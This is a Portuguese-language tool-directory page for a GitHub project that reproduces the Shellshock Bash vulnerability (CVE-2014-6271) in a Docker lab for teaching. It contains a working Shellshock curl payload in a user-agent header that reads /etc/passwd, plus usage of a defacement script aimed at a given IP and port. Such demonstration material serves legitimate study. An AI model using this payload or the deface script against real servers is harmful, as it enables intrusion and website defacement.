Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2014-6271 — Projeto de apresentação de uma CVE (ShellShock) com pdf, demonstração técnica e reprodutível. | Kitploit
Ferramentas/GitHubGitHub/radyio/cve-2014-6271
Segurança de ContêineresAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubradyio/cve-2014-6271

CVE-2014-6271

Projeto de apresentação de uma CVE (ShellShock) com pdf, demonstração técnica e reprodutível.

Ver Repositório
1há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Site

CVE-2014-6271

Descrição

Este projeto permite reproduzir a vulnerabilidade CVE-2014-6271, também conhecida como Shellshock. Shellshock é uma vulnerabilidade de segurança no Bash que permite executar código malicioso através de variáveis de ambiente.

O objetivo deste projeto é demonstrar o impacto desta vulnerabilidade em um ambiente Docker.

Pré-requisitos

Antes de começar, certifique-se de ter o Docker instalado em sua máquina. Você pode baixar o Docker aqui.

Instalação e execução

1. Construir a imagem Docker

No diretório do projeto, construa a imagem Docker executando o seguinte comando:

root@kitploit:~
docker build -t ['image name'] .

Substitua ['image name'] pelo nome que você deseja dar à imagem Docker.

2. Iniciar o contêiner Docker

Após construir a imagem, inicie um contêiner a partir desta imagem com o seguinte comando:

root@kitploit:~
docker run -it --rm -p 8080:80 ['image name']

Isso exporá o serviço na porta 8080 da sua máquina local.

3. Acessar a aplicação

Abra seu navegador e acesse http://localhost:8080. Você poderá observar o comportamento da aplicação e testar a vulnerabilidade.

4-1. Explorar a vulnerabilidade

Em outro terminal, execute o seguinte comando para explorar a vulnerabilidade e ler o conteúdo do arquivo /etc/passwd:

root@kitploit:~
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \
http://localhost:8080/cgi-bin/vulnerable

Este comando envia um cabeçalho user-agent especialmente projetado para explorar o Shellshock. Se a vulnerabilidade for corretamente reproduzida, o conteúdo de /etc/passwd será exibido na saída do terminal.

4-2. Explorar a vulnerabilidade (script exp_deface.sh)

Este script permite explorar a vulnerabilidade para desfigurar uma página web alvo. A vulnerabilidade baseia-se em uma má configuração de scripts CGI, que permite a execução de comandos arbitrários no servidor.

Pré-requisito: Certifique-se de que o alvo é vulnerável ao bug ShellShock. Certifique-se de ter as permissões necessárias para testar o exploit neste alvo.

root@kitploit:~
./exp_deface.sh <ip> <port>

./exp_deface.sh localhost 8080

Segurança

Importante: Esta vulnerabilidade deve ser usada apenas para fins de teste e demonstração em um ambiente controlado. Não use este projeto em ambientes de produção.

Baixar ferramenta